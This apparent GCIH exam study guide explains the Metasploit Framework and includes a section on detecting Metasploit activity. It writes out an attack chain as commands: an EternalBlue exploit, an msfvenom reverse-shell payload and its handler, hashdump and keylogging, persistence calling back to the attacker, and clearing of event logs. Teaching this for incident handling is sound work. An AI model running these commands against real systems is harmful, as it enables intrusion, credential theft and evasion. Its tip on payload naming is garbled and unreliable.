Metasploit Framework Operations: A Comprehensive Guide for GIAC GCIH
Why Metasploit Framework Operations Matter
The Metasploit Framework is one of the most widely used penetration testing and exploitation platforms in the world. For GIAC GCIH (GIAC Certified Incident Handler) candidates, understanding Metasploit is critical because it is frequently leveraged by both ethical hackers and malicious actors. As an incident handler, you must understand how attackers use Metasploit to exploit vulnerabilities, escalate privileges, and maintain persistence. Recognizing Metasploit-generated traffic, payloads, and artifacts is essential for effective detection, response, and remediation.
What is the Metasploit Framework?
The Metasploit Framework is an open-source penetration testing platform originally developed by H.D. Moore in 2003 and now maintained by Rapid7. It provides a structured environment for:
- Exploit Development and Execution: A vast library of exploits targeting known vulnerabilities across operating systems, applications, and services.
- Payload Generation and Delivery: Tools for creating and delivering payloads (the code that runs after successful exploitation).
- Post-Exploitation Activities: Modules for privilege escalation, credential harvesting, lateral movement, and maintaining access.
- Auxiliary Modules: Scanners, fuzzers, and other utilities that support reconnaissance and information gathering.
Metasploit is available in several editions: the open-source Metasploit Framework (command-line driven via msfconsole), and the commercial Metasploit Pro (with a web-based GUI and additional features).
Key Components of the Metasploit Framework
1. msfconsole
The primary interface for interacting with Metasploit. It is a command-line console that provides access to all modules, exploits, payloads, and configuration options. Most exam questions reference operations performed within msfconsole.
2. Exploits
Exploits are modules that take advantage of specific vulnerabilities in target systems. They are organized by platform and service (e.g., exploit/windows/smb/ms17_010_eternalblue). Each exploit targets a specific CVE or known weakness.
3. Payloads
Payloads are the code delivered to the target after successful exploitation. Key payload types include:
- Singles (Inline Payloads): Self-contained payloads that perform a single action (e.g., windows/exec).
- Stagers: Small payloads that set up a communication channel between the attacker and the target, then download and execute a larger payload (the stage).
- Stages: Larger payloads downloaded by stagers (e.g., Meterpreter).
- Meterpreter: An advanced, in-memory payload that provides a powerful post-exploitation shell with capabilities like file system access, process migration, screenshot capture, keylogging, pivoting, and privilege escalation. Meterpreter operates entirely in memory, making it harder to detect with traditional antivirus.
Payload naming convention: platform/type/connection_method
Example: windows/meterpreter/reverse_tcp — a Windows Meterpreter payload using a reverse TCP connection.
4. Auxiliary Modules
These are non-exploit modules used for scanning, enumeration, fuzzing, denial of service, and other tasks. Examples include port scanners, service version detectors, and brute-force login modules (e.g., auxiliary/scanner/smb/smb_version).
5. Post-Exploitation Modules
Modules used after gaining access to a target system, including:
- Credential dumping (e.g., post/windows/gather/hashdump)
- Privilege escalation (e.g., post/multi/recon/local_exploit_suggester)
- Persistence mechanisms
- Network pivoting and port forwarding
6. Encoders
Encoders transform payloads to evade signature-based detection (e.g., x86/shikata_ga_nai). They do not encrypt payloads but obfuscate them.
7. Nops
NOP (No Operation) generators create padding for payloads to ensure proper alignment during exploitation.
How Metasploit Operations Work: Step-by-Step
Step 1: Reconnaissance and Scanning
Use auxiliary modules or external tools (Nmap integration via db_nmap) to identify targets, open ports, and services.
Commands:
- db_nmap -sV -O 192.168.1.0/24
- use auxiliary/scanner/portscan/tcp
Step 2: Select an Exploit
Search for and select an appropriate exploit based on identified vulnerabilities.
Commands:
- search type:exploit name:eternalblue
- use exploit/windows/smb/ms17_010_eternalblue
- info (to view exploit details, required options, and target compatibility)
Step 3: Configure the Exploit
Set required options such as RHOSTS (target IP), RPORT (target port), and other parameters.
Commands:
- set RHOSTS 192.168.1.100
- set RPORT 445
- show options (to verify configuration)
Step 4: Select and Configure a Payload
Choose a payload compatible with the exploit and target system.
Commands:
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.1.50 (attacker's IP for reverse connections)
- set LPORT 4444 (attacker's listening port)
Key Concept — Reverse vs. Bind Payloads:
- Reverse payloads (reverse_tcp, reverse_https): The target connects back to the attacker. This is preferred because it bypasses firewall rules that block inbound connections to the target.
- Bind payloads (bind_tcp): The target opens a listening port and waits for the attacker to connect. This can be blocked by firewalls.
Step 5: Execute the Exploit
Commands:
- exploit or run
- exploit -j (run as a background job)
Step 6: Post-Exploitation with Meterpreter
Once a Meterpreter session is established, the attacker has extensive control:
- sysinfo — Display target system information
- getuid — Show current user context
- getsystem — Attempt privilege escalation to SYSTEM
- hashdump — Dump password hashes from SAM database
- migrate [PID] — Migrate Meterpreter to another process (for stability and stealth)
- upload / download — Transfer files
- shell — Drop into a native command shell
- keyscan_start / keyscan_dump — Keylogging
- screenshot — Capture screenshot
- portfwd add -l 3389 -p 3389 -r [target] — Port forwarding for pivoting
- run autoroute -s 10.10.10.0/24 — Add routes for pivoting to internal networks
- background — Background the session and return to msfconsole
- sessions -l — List active sessions
- sessions -i [id] — Interact with a specific session
Step 7: Maintaining Access and Persistence
Metasploit offers persistence modules to maintain access after reboots:
- run persistence -U -i 5 -p 4444 -r [attacker IP]
- Post modules like post/windows/manage/persistence_exe
Step 8: Cleanup
Clearing tracks by removing logs, artifacts, and persistence mechanisms.
- clearev — Clear Windows event logs from Meterpreter
Important Metasploit Concepts for the GCIH Exam
The Metasploit Database:
Metasploit uses a PostgreSQL database to store scan results, credentials, and session data. Commands include db_status, hosts, services, vulns, and creds.
msfvenom:
A standalone tool for generating payloads outside of msfconsole. It combines the old msfpayload and msfencode tools.
Example: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o payload.exe
This creates a standalone executable that, when run on a target, establishes a reverse Meterpreter session.
Handlers:
The exploit/multi/handler module is used to catch incoming connections from payloads generated with msfvenom or delivered through other means. This is a critical module for exam scenarios.
Setup:
- use exploit/multi/handler
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.1.50
- set LPORT 4444
- exploit
Session Management:
- sessions -l — List all active sessions
- sessions -i 1 — Interact with session 1
- sessions -k 1 — Kill session 1
- sessions -u 1 — Upgrade a shell session to Meterpreter
Pivoting:
Using a compromised host to access other networks. Metasploit supports pivoting through autoroute and SOCKS proxy modules. This is a key concept — attackers use pivoting to reach systems not directly accessible from their position.
Detection and Incident Handling Perspective
As an incident handler, knowing how Metasploit works helps you:
- Identify Indicators of Compromise (IOCs): Meterpreter default ports (4444), reverse TCP connections to external IPs, unusual processes, and in-memory injections.
- Recognize Metasploit artifacts: Default payload signatures, staged payload traffic patterns, and Meterpreter communication protocols (HTTP/HTTPS/TCP).
- Detect exploitation attempts: Network signatures matching known Metasploit exploit modules (many IDS/IPS systems have Metasploit-specific rules).
- Respond effectively: Understanding the attack chain helps you contain, eradicate, and recover from incidents involving Metasploit-based attacks.
Common Metasploit Commands Summary for Exam Reference
- search — Find modules by name, type, CVE, or platform
- use — Select a module
- info — Display module details
- show options — Display required and optional settings
- show payloads — List compatible payloads for current exploit
- show targets — List available target configurations
- set / setg — Set local or global options
- check — Test if a target is vulnerable without exploiting
- exploit / run — Execute the module
- back — Deselect the current module
- jobs — List background jobs
- workspace — Manage database workspaces
Exam Tips: Answering Questions on Metasploit Framework Operations
1. Know the Terminology: Be precise about the difference between exploits, payloads (singles, stagers, stages), auxiliary modules, encoders, and post modules. Exam questions often test whether you can distinguish between these components.
2. Understand Payload Naming Conventions: A payload name like windows/meterpreter/reverse_tcp tells you the platform (Windows), the stage (Meterpreter), and the stager (reverse_tcp). A single slash (e.g., windows/shell_reverse_tcp) indicates a single (inline) payload, while a double-path structure indicates a staged payload.
3. Reverse vs. Bind — Know When Each is Used: Questions frequently ask about when a reverse payload is preferable. Remember: reverse payloads are used when the target is behind a firewall that blocks inbound connections. The target initiates the connection outbound to the attacker.
4. LHOST vs. RHOST: LHOST is the attacker's (local) IP address; RHOSTS is the target's (remote) IP address. Mixing these up is a common mistake on the exam. LPORT is the attacker's listening port; RPORT is the target service port.
5. Meterpreter is In-Memory: Remember that Meterpreter runs entirely in memory and does not write to disk by default, which makes it stealthy. Questions may ask about why Meterpreter is harder to detect than traditional payloads.
6. exploit/multi/handler: Know that this module is the generic listener for catching reverse connections. It is used with msfvenom-generated payloads and client-side attacks.
7. Process Migration: Understand that attackers migrate Meterpreter to a more stable, long-running process (like explorer.exe or svchost.exe) to avoid detection and survive if the initial exploited process terminates.
8. Post-Exploitation Commands: Be familiar with key Meterpreter commands: getsystem, hashdump, migrate, portfwd, autoroute, and clearev. These frequently appear in scenario-based questions.
9. Think Like an Incident Handler: Many GCIH questions frame scenarios from the defender's perspective. If a question describes unusual outbound traffic on port 4444 to an external IP, suspicious in-memory activity, or credential dumping, think Metasploit/Meterpreter.
10. Know Key Exploits by Name: Be familiar with commonly referenced Metasploit modules, especially ms17_010_eternalblue (SMB), ms08_067_netapi (SMB), and psexec (pass-the-hash). These are classic examples in the GCIH curriculum.
11. Use Process of Elimination: If an exam question presents multiple tools or frameworks, remember that Metasploit is specifically a modular exploitation framework. Don't confuse it with standalone tools like Hydra (brute-forcing), John the Ripper (password cracking), or Nmap (scanning), even though Metasploit can integrate with some of these.
12. Practice with Index Tabs: The GCIH exam is open-book. Index your course materials with tabs for Metasploit commands, payload types, Meterpreter commands, and common exploit modules so you can quickly reference them during the exam.
13. Scenario-Based Questions: Expect questions that present a command sequence or output and ask you to identify what is happening. Practice reading Metasploit console output and understanding the attack flow from exploit selection through post-exploitation.
By mastering these concepts and operational details, you will be well-prepared to answer Metasploit Framework questions on the GCIH exam with confidence and accuracy.
